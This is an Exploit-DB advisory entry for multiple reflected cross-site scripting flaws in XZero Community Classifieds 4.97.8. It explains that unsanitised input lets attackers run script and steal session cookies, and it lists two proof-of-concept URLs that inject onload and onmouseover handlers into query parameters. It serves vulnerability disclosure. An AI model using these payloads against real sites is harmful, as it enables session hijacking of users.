XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities

2009-06-24T00:00:00
ID EDB-ID:33110
Type exploitdb
Reporter Moudi
Modified 2009-06-24T00:00:00

Description

XZeroScripts XZero Community Classifieds 4.97.8 Multiple Cross Site Scripting Vulnerabilities. CVE-2009-2893 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/35809/info

XZeroScripts XZero Community Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

The issues affect XZeroScripts XZero Community Classifieds 4.97.8; other versions may also be vulnerable. 

http://www.example.com/xzero_classifieds/?_xzcal_m=6&_xzcal_y=1<body+onload=alert(318724525577)>
http://www.example.com/xzero_classifieds/index.php?cityid=1777&view=post&postevent=1"+onmouseover=alert(390684711834)+